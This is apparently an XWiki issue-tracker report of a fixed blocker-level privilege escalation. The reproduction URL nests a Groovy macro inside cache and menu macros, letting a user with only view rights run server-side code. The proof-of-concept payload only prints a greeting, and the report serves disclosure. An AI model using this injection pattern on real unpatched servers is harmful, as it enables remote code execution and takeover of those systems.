Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
5.1
-
High
-
Unknown
-
N/A
-
N/A
-
Description
Steps to reproduce:
Open <server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%2F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7Bmenu%7D%7D%7B%7Bcache+id%3D%22menuMacro%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+from+Groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%7B%7B%2Fmenu%7D%7D where <server> is the URL of your XWiki installation
Expected result:
An error that the current user doesn't have programming rights.
Actual result:
The text "Hello from Groovy!" is displayed, showing that we've executed a Groovy macro and thus gained programming rights from view rights.
Note that while the reproduction steps above use the content, the same kind of privilege escalation is also possible using the id and type parameters.
The affects version is only the version where the problem has been reproduced, this is most likely as old as the menu macro which has been introduced in XWIKI-9148, i.e., XWiki 5.1-rc-1.
Attachments
Issue Links
- is caused by
-
XWIKI-9148 Implement an extensible and reusable horizontal menu
-
- Closed
-
- links to